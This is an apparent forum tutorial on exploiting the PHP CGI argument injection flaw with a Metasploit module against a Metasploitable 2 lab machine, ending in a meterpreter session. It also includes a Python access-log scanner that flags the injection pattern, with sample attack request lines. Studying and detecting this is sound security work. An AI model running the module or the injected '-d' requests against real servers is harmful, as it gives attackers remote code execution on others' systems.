PHP CGI ARGUMENT INJECTION using Metasploit
Hello Everyone,
Today I would like to demonstrate how we can do PHP CGI argument injection using Metasploit.
So, if you don't know about Metasploit, then check my tutorials:
==>Metasploit Playlists<==
So, if you already know about Metasploit, then let's start.
The module that we are going to use is: exploit/multi/http/php_cgi_arg_injection
About this vulnerability, by Rapid7
So they say: "When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: "if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the "encoded in a system-defined manner" from the RFC) and then passes them to the CGI binary.""
This means that when the query string contains no unescaped '=', its parts are handed to the PHP CGI binary as command-line arguments, so by adding a parameter such as the -d flag we can set php.ini directives and run arbitrary code.
So let's try to exploit it.
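The splitting rule quoted from the advisory above can also be applied on the defending side, to find such requests in a web server access log. The following Python is an added example, not part of the original tutorial or of Metasploit; the log format (Apache combined), the function names, the placeholder directive name and the sample log lines are all assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line as it appears in an Apache combined-format access log (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def cgi_args(query):
    """Apply the advisory's rule: with no unescaped '=' in the query string,
    split on '+' and urldecode each part. Returns [] for normal form data."""
    if not query or "=" in query:
        return []
    return [unquote(part) for part in query.split("+") if part]

def injected_switches(log_line):
    """Return the decoded argument list if any argument looks like a
    command-line switch (starts with '-'), otherwise []."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    _, _, query = match.group(1).partition("?")
    args = cgi_args(query)
    return args if any(a.startswith("-") for a in args) else []

def scan(lines):
    """Return (line_number, args) for every flagged line, numbering from 1."""
    hits = []
    for number, line in enumerate(lines, start=1):
        args = injected_switches(line)
        if args:
            hits.append((number, args))
    return hits

# Constructed sample log lines (documentation IP range, placeholder directive name).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home&id=3 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?-d+example_directive%3d1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "POST /index.php?%2dd+example_directive%3d1 HTTP/1.1" 200 40',
    '198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?hello+world HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for number, args in scan(SAMPLE_LOG):
        print(f"line {number}: query would reach php-cgi as arguments {args}")
```

The third sample line shows why the check decodes before testing for a leading '-': a percent-encoded dash produces the same argument list as a literal one.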
We are going to use Metasploitable 2.
1. Open Metasploit console.
![[Image: H8B4rmb.png]](https://i.imgur.com/H8B4rmb.png)
2. Then just select the php_cgi_arg_injection module.
Code:
msf> use exploit/multi/http/php_cgi_arg_injection
![[Image: 8a6B1oA.png]](https://i.imgur.com/8a6B1oA.png)
3. Now just set the options and exploit.
Quote:
msf exploit(php_cgi_arg_injection) > set RHOST 172.16.18.134
RHOST => 172.16.18.134
msf exploit(php_cgi_arg_injection) > exploit
And done, we got a meterpreter session.
![[Image: rczIdmz.png]](https://i.imgur.com/rczIdmz.png)
Done :D We got a meterpreter session.
![[Image: 3ZoFrbK.png]](https://i.imgur.com/3ZoFrbK.png)
If you will like this,
![[Image: 1vmW1XH.png]](https://i.imgur.com/1vmW1XH.png)